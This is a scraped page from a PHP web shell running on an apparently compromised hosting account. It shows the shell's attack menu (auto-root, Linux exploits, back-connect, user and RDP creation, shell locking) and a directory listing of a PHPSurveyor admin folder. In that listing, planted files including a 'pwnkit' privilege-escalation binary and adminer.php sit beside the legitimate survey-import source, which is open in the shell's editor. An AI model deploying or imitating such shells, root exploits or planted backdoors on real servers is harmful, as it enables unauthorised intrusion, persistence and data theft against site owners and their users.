Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
formulaires /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.htaccess
139
B
-rwxr--r--
.htaccess.old
142
B
-rwxr--r--
.htpasswd
58
B
-rwxr--r--
.htpasswd.old
22
B
-rwxr--r--
.mad-root
0
B
-rw-r--r--
activate.php
20.19
KB
-rwxr--r--
admin.php
7.94
KB
-rwxr--r--
adminer.php
465.43
KB
-rw-r--r--
adminstyle.css
1.27
KB
-rwxr--r--
assessments.php
8.46
KB
-rwxr--r--
browse.php
25.36
KB
-rwxr--r--
checkfields.php
17.28
KB
-rwxr--r--
conditions.php
26.91
KB
-rwxr--r--
createdb.php
3.39
KB
-rwxr--r--
database.php
33.48
KB
-rwxr--r--
dataentry.php
88.65
KB
-rwxr--r--
dbchecker.php
15.31
KB
-rwxr--r--
dbedit.php
19.4
KB
-rwxr--r--
deactivate.php
6.03
KB
-rwxr--r--
deletesurvey.php
5.78
KB
-rwxr--r--
dumpdb.php
5.11
KB
-rwxr--r--
dumpgroup.php
6.25
KB
-rwxr--r--
dumplabel.php
4.62
KB
-rwxr--r--
dumpquestion.php
5.5
KB
-rwxr--r--
dumpsurvey.php
6.2
KB
-rwxr--r--
export.php
30.1
KB
-rwxr--r--
favicon.ico
894
B
-rwxr--r--
html.php
100.41
KB
-rwxr--r--
importgroup.php
21.69
KB
-rwxr--r--
importlabel.php
8.05
KB
-rwxr--r--
importoldresponses.php
4.94
KB
-rwxr--r--
importquestion.php
16.2
KB
-rwxr--r--
importsurvey.php
31.83
KB
-rwxr--r--
index.php
16.12
KB
-rwxr--r--
info.php
30
B
-rw-r--r--
labels.php
26.27
KB
-rwxr--r--
listcolumn.php
3.25
KB
-rwxr--r--
manual.html
389
B
-r--r--r--
navigator.php
90.1
KB
-rwxr--r--
phpsurveyor.css
5.73
KB
-rwxr--r--
printablesurvey.php
28.13
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
results.php
17.78
KB
-rwxr--r--
resultsdump.php
3.68
KB
-rwxr--r--
saved.php
6.22
KB
-rwxr--r--
sessioncontrol.php
2.07
KB
-rwxr--r--
spss.php
9.38
KB
-rwxr--r--
statistics.php
81.63
KB
-rwxr--r--
templates.php
30.72
KB
-rwxr--r--
tokens.php
61.79
KB
-rwxr--r--
usercontrol.php
7.28
KB
-rwxr--r--
vvexport.php
8.74
KB
-rwxr--r--
vvimport.php
8.67
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : importquestion.php
<?php /* ############################################################# # >>> PHPSurveyor # ############################################################# # > Author: Jason Cleeland # # > E-mail: jason@cleeland.org # # > Mail: Box 99, Trades Hall, 54 Victoria St, # # > CARLTON SOUTH 3053, AUSTRALIA # > Date: 20 February 2003 # # # # This set of scripts allows you to develop, publish and # # perform data-entry on surveys. # ############################################################# # # # Copyright (C) 2003 Jason Cleeland # # # # This program is free software; you can redistribute # # it and/or modify it under the terms of the GNU General # # Public License as published by the Free Software # # Foundation; either version 2 of the License, or (at your # # option) any later version. # # # # This program is distributed in the hope that it will be # # useful, but WITHOUT ANY WARRANTY; without even the # # implied warranty of MERCHANTABILITY or FITNESS FOR A # # PARTICULAR PURPOSE. See the GNU General Public License # # for more details. # # # # You should have received a copy of the GNU General # # Public License along with this program; if not, write to # # the Free Software Foundation, Inc., 59 Temple Place - # # Suite 330, Boston, MA 02111-1307, USA. # ############################################################# */ //Ensure script is not run directly, avoid path disclosure if (empty($homedir)) {die ("Cannot run this script directly");} // A FILE TO IMPORT A DUMPED SURVEY FILE, AND CREATE A NEW SURVEY echo "<br />\n" ."<table width='350' align='center' style='border: 1px solid #555555' cellpadding='1' cellspacing='0'>\n" ."\t<tr bgcolor='#555555'><td colspan='2' height='4'><font size='1' face='verdana' color='white'><strong>" ._IMPORTQUESTION."</strong></td></tr>\n" ."\t<tr bgcolor='#CCCCCC'><td align='center'>$setfont\n"; $the_full_file_path = $tempdir . "/" . $_FILES['the_file']['name']; if (!@move_uploaded_file($_FILES['the_file']['tmp_name'], $the_full_file_path)) { echo "<strong><font color='red'>"._ERROR."</font></strong><br />\n" ._IS_FAILUPLOAD."<br /><br />\n" ."<input $btstyle type='submit' value='" ._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n" ."</td></tr></table>\n" ."</body>\n</html>\n"; exit; } // IF WE GOT THIS FAR, THEN THE FILE HAS BEEN UPLOADED SUCCESFULLY echo "<strong><font color='green'>"._SUCCESS."</font></strong><br />\n" ._IS_OKUPLOAD."<br /><br />\n" ._IS_READFILE."<br />\n"; $handle = fopen($the_full_file_path, "r"); while (!feof($handle)) { //$buffer = fgets($handle, 1024); //Length parameter is required for PHP versions < 4.2.0 $buffer = fgets($handle, 10240); //To allow for very long survey welcomes (up to 10k) $bigarray[] = $buffer; } fclose($handle); if (!$_POST['sid']) { echo _IQ_NOSID."<br /><br />\n" ."<input $btstyle type='submit' value='" ._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n" ."</td></tr></table>\n" ."</body>\n</html>\n"; exit; } if (!$_POST['gid']) { echo _IQ_NOGID."<br /><br />\n" ."<input $btstyle type='submit' value='" ._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n" ."</td></tr></table>\n" ."</body>\n</html>\n"; exit; } if (substr($bigarray[1], 0, 24) != "# SURVEYOR QUESTION DUMP") { echo "<strong><font color='red'>"._ERROR."</font></strong><br />\n" ._IQ_WRONGFILE."<br /><br />\n" ."<input $btstyle type='submit' value='" ._GO_ADMIN."' onClick=\"window.open('$scriptname?sid=$surveyid&gid=$gid', '_top')\">\n" ."</td></tr></table>\n" ."</body>\n</html>\n"; exit; } for ($i=0; $i<9; $i++) //skipping the first lines that are not needed { unset($bigarray[$i]); } $bigarray = array_values($bigarray); //QUESTIONS if (array_search("# ANSWERS TABLE\n", $bigarray)) { $stoppoint = array_search("# ANSWERS TABLE\n", $bigarray); } elseif (array_search("# ANSWERS TABLE\r\n", $bigarray)) { $stoppoint = array_search("# ANSWERS TABLE\r\n", $bigarray); } else { $stoppoint = count($bigarray)-1; } for ($i=0; $i<=$stoppoint+1; $i++) { if ($i<$stoppoint-2) {$questionarray[] = $bigarray[$i];} unset($bigarray[$i]); } $bigarray = array_values($bigarray); //ANSWERS if (array_search("# LABELSETS TABLE\n", $bigarray)) { $stoppoint = array_search("# LABELSETS TABLE\n", $bigarray); } elseif (array_search("# LABELSETS TABLE\r\n", $bigarray)) { $stoppoint = array_search("# LABELSETS TABLE\r\n", $bigarray); } else { $stoppoint = count($bigarray)-1; } for ($i=0; $i<=$stoppoint+1; $i++) { if ($i<$stoppoint-2) {$answerarray[] = str_replace("`default`", "`default_value`", $bigarray[$i]);} unset($bigarray[$i]); } $bigarray = array_values($bigarray); //LABELSETS if (array_search("# LABELS TABLE\n", $bigarray)) { $stoppoint = array_search("# LABELS TABLE\n", $bigarray); } elseif (array_search("# LABELS TABLE\r\n", $bigarray)) { $stoppoint = array_search("# LABELS TABLE\r\n", $bigarray); } else { $stoppoint = count($bigarray)-1; } for ($i=0; $i<=$stoppoint+1; $i++) { if ($i<$stoppoint-2) {$labelsetsarray[] = $bigarray[$i];} unset($bigarray[$i]); } $bigarray = array_values($bigarray); //LABELS if (array_search("# QUESTION_ATTRIBUTES TABLE\n", $bigarray)) { $stoppoint = array_search("# QUESTION_ATTRIBUTES TABLE\n", $bigarray); } elseif (array_search("# QUESTION_ATTRIBUTES TABLE\r\n", $bigarray)) { $stoppoint = array_search("# QUESTION_ATTRIBUTES TABLE\r\n", $bigarray); } else { $stoppoint = count($bigarray)-1; } for ($i=0; $i<=$stoppoint+1; $i++) { if ($i<$stoppoint-2) {$labelsarray[] = $bigarray[$i];} unset($bigarray[$i]); } $bigarray = array_values($bigarray); //LAST LOT (now question_attributes) if (!isset($noconditions) || $noconditions != "Y") { $stoppoint = count($bigarray)-1; for ($i=0; $i<=$stoppoint+1; $i++) { if ($i<$stoppoint-1) {$question_attributesarray[] = $bigarray[$i];} unset($bigarray[$i]); } } $bigarray = array_values($bigarray); ////ANSWERS //if (array_search("#</pre>\n", $bigarray)) // { // $stoppoint = array_search("#</pre>\n", $bigarray); // } //if (array_search("#</pre>\r\n", $bigarray)) // { // $stoppoint = array_search("#</pre>\r\n", $bigarray); // } //else // { // $stoppoint = count($bigarray)-1; // } //for ($i=0; $i<$stoppoint; $i++) // { // $labelsarray[] = $bigarray[$i]; // //echo "($i)[$stoppoint]An Answer! - {$bigarray[$i]}<br />"; // unset($bigarray[$i]); // } //$bigarray = array_values($bigarray); if (isset($questionarray)) {$countquestions = count($questionarray);} if (isset($answerarray)) {$countanswers = count($answerarray);} if (isset($labelsetsarray)) {$countlabelsets = count($labelsetsarray);} if (isset($labelsarray)) {$countlabels = count($labelsarray);} if (isset($question_attributesarray)) {$countquestion_attributes = count($question_attributesarray);} else {$countquestion_attributes=0;} // GET SURVEY AND GROUP DETAILS $surveyid=$_POST['sid']; $gid=$_POST['gid']; $newsid=$surveyid; $newgid=$gid; //DO ANY LABELSETS FIRST, SO WE CAN KNOW WHAT THEIR NEW LID IS FOR THE QUESTIONS if (isset($labelsetsarray) && $labelsetsarray) { $csarray=buildLabelsetCSArray(); foreach ($labelsetsarray as $lsa) { $fieldorders=convertToArray($lsa, "`, `", "(`", "`)"); $fieldcontents=convertToArray($lsa, "', '", "('", "')"); $oldlidpos=array_search("lid", $fieldorders); $oldlid=$fieldcontents[$oldlidpos]; $lsainsert = str_replace("'$oldlid'", "''", $lsa); $lsainsert = str_replace("INTO labelsets", "INTO {$dbprefix}labelsets", $lsainsert); //db prefix handler $lsiresult=mysql_query($lsainsert); $newlid=mysql_insert_id(); if ($labelsarray) { foreach ($labelsarray as $la) { $lfieldorders=convertToArray($la, "`, `", "(`", "`)"); $lfieldcontents=convertToArray($la, "', '", "('", "')"); $labellidpos=array_search("lid", $lfieldorders); $labellid=$lfieldcontents[$labellidpos]; if ($labellid == $oldlid) { $lainsert = str_replace("'$labellid'", "'$newlid'", $la); $lainsert = str_replace ("INTO labels", "INTO {$dbprefix}labels", $lainsert); $liresult=mysql_query($lainsert); } } } //CHECK FOR DUPLICATE LABELSETS $thisset=""; $query2 = "SELECT code, title, sortorder FROM {$dbprefix}labels WHERE lid=".$newlid." ORDER BY sortorder, code"; $result2 = mysql_query($query2) or die("Died querying labelset $lid<br />$query2<br />".mysql_error()); $numfields=mysql_num_fields($result2); while($row2=mysql_fetch_row($result2)) { for ($i=0; $i<=$numfields-1; $i++) { $thisset .= $row2[$i]; } } // while $newcs=dechex(crc32($thisset)*1); if (isset($csarray)) { foreach($csarray as $key=>$val) { if ($val == $newcs) { $lsmatch=$key; } } } if (isset($lsmatch)) { //There is a matching labelset. So, we will delete this one and refer //to the matched one. $query = "DELETE FROM {$dbprefix}labels WHERE lid=$newlid"; $result=mysql_query($query) or die("Couldn't delete labels<br />$query<br />".mysql_error()); $query = "DELETE FROM {$dbprefix}labelsets WHERE lid=$newlid"; $result=mysql_query($query) or die("Couldn't delete labelset<br />$query<br />".mysql_error()); $newlid=$lsmatch; } else { //There isn't a matching labelset, add this checksum to the $csarray array $csarray[$newlid]=$newcs; } //END CHECK FOR DUPLICATES $labelreplacements[]=array($oldlid, $newlid); } } // QUESTIONS, THEN ANSWERS FOR QUESTIONS IN A NESTED FORMAT! if (isset($questionarray) && $questionarray) { foreach ($questionarray as $qa) { $qafieldorders=convertToArray($qa, "`, `", "(`", "`)"); $qacfieldcontents=convertToArray($qa, "', '", "('", "')"); $oldsid=$qacfieldcontents[array_search("sid", $qafieldorders)]; $oldgid=$qacfieldcontents[array_search("gid", $qafieldorders)]; $oldqid=$qacfieldcontents[array_search("qid", $qafieldorders)]; $qinsert=str_replace_once("'$oldqid'", "''", $qa); $qinsert=str_replace_once("'$oldsid'", "'$surveyid'", $qinsert); $qinsert=str_replace_once("'$oldgid'", "'$gid'", $qinsert); $qinsert = str_replace("INTO questions", "INTO {$dbprefix}questions", $qinsert); $qres = mysql_query($qinsert) or die ("<strong>"._ERROR.":</strong> Failed to insert question<br />\n$qinsert<br />\n".mysql_error()); //GET NEW QID, AND WHILE WE'RE AT IT - THE TYPE! $qidquery = "SELECT qid, lid, type FROM {$dbprefix}questions ORDER BY qid DESC LIMIT 1"; $qidres = mysql_query($qidquery); while ($qrow = mysql_fetch_row($qidres)) {$newqid = $qrow[0]; $oldlid=$qrow[1]; $type=$qrow[2];} if ($type == "F" || $type == "H") { foreach ($labelreplacements as $lrp) { if ($lrp[0] == $oldlid) { $lrupdate="UPDATE {$dbprefix}questions SET lid='{$lrp[1]}' WHERE qid=$newqid"; $lrresult=mysql_query($lrupdate); } } } $newrank=0; //NOW DO NESTED ANSWERS FOR THIS QID if (isset($answerarray) && $answerarray) { foreach ($answerarray as $aa) { $aafieldorders=convertToArray($aa, "`, `", "(`", "`)"); $aacfieldcontents=convertToArray($aa, "', '", "('", "')"); $code=$aacfieldcontents[array_search("code", $aafieldorders)]; $thisqid=$aacfieldcontents[array_search("qid", $aafieldorders)]; if ($thisqid == $oldqid) { $ainsert = str_replace("('$oldqid", "('$newqid", $aa); $ainsert = str_replace("INTO answers", "INTO {$dbprefix}answers", $ainsert); //$ainsert = substr(trim($ainsert), 0, -1); //echo "$ainsert<br />\n"; $ares = mysql_query($ainsert) or die ("<strong>"._ERROR.":</strong> Failed to insert answer<br />\n$ainsert<br />\n".mysql_error()."</body>\n</html>"); if ($type == "A" || $type == "B" || $type == "C" || $type == "M" || $type == "P") { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid.$code, $newsid."X".$newgid."X".$newqid.$code); if ($type == "P") { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid.$code."comment", $newsid."X".$newgid."X".$newqid.$code."comment"); } } elseif ($type == "R") { $newrank++; } } } if (($type == "A" || $type == "B" || $type == "C" || $type == "M" || $type == "P") && isset($other) && ($other == "Y")) { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid."other", $newsid."X".$newgid."X".$newqid."other"); if ($type == "P") { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid."othercomment", $newsid."X".$newgid."X".$newqid."othercomment"); } } if ($type == "R" && $newrank >0) { for ($i=1; $i<=$newrank; $i++) { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid.$i, $newsid."X".$newgid."X".$newqid.$i); } } if ($type != "A" && $type != "B" && $type != "C" && $type != "R" && $type != "M" && $type != "P") { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid, $newsid."X".$newgid."X".$newqid); if ($type == "O") { $fieldnames[]=array($oldsid."X".$oldgid."X".$oldqid."comment", $newsid."X".$newgid."X".$newqid."comment"); } } $substitutions[]=array($oldsid, $oldgid, $oldqid, $newsid, $newgid, $newqid); } //NOW DO question_attributes if there are any if (isset($question_attributesarray) && $question_attributesarray) {//ONLY DO THIS IF THERE ARE QUESTION_ATTRIBUES foreach ($question_attributesarray as $qar) { $fieldorders=convertToArray($qar, "`, `", "(`", "`)"); $fieldcontents=convertToArray($qar, "', '", "('", "')"); $newfieldcontents=$fieldcontents; $oldqid=$fieldcontents[array_search("qid", $fieldorders)]; $newfieldcontents[array_search("qid", $fieldorders)]=$newqid; $newfieldcontents[array_search("qaid", $fieldorders)]=""; $newvalues="('".implode("', '", $newfieldcontents)."')"; $insert=str_replace("('".implode("', '", $fieldcontents)."')", $newvalues, $qar); $insert=str_replace("INTO question_attributes", "INTO {$dbprefix}question_attributes", $insert); $result=mysql_query($insert) or die ("Couldn't insert question_attribute<br />$insert<br />".mysql_error()); unset($newcqid); } } } } //We've built two arrays along the way - one containing the old SID, GID and QIDs - and their NEW equivalents //and one containing the old 'extended fieldname' and its new equivalent. These are needed to import conditions. echo "<br />\n<strong><font color='green'>"._SUCCESS."</font></strong><br />\n" ."<strong><u>"._IQ_IMPORTSUMMARY."</u></strong><br />\n" ."\t<li>"._QUESTIONS.": "; if (isset($countquestions)) {echo $countquestions;} echo "</li>\n" ."\t<li>"._ANSWERS.": "; if (isset($countanswers)) {echo $countanswers;} echo "</li><br />\n" ."\t<li>"._LABELSETS.": "; if (isset($countlabelsets)) {echo $countlabelsets;} echo " ("; if (isset($countlabels)) {echo $countlabels;} echo ")</li><br />\n"; echo "\t<li>"._QL_QUESTIONATTRIBUTES; if (isset($countquestion_attributes)) {echo $countquestion_attributes;} echo "</li></ul><br />\n"; echo "<strong>"._IS_SUCCESS."</strong><br />\n" ."<input $btstyle type='submit' value='" ._GO_ADMIN."' onClick=\"window.open('$scriptname?sid=$surveyid&gid=$gid&qid=$newqid', '_top')\">\n" ."</td></tr></table>\n" ."</body>\n</html>"; unlink($the_full_file_path); function convertToArray($string, $seperator, $start, $end) { $begin=strpos($string, $start)+strlen($start); $len=strpos($string, $end)-$begin; $order=substr($string, $begin, $len); $orders=explode($seperator, $order); return $orders; } function str_replace_once($needle, $replace, $haystack) { // Looks for the first occurence of $needle in $haystack // and replaces it with $replace. $pos = strpos($haystack, $needle); if ($pos === false) { // Nothing found return $haystack; } return substr_replace($haystack, $replace, $pos, strlen($needle)); } ?>
Close
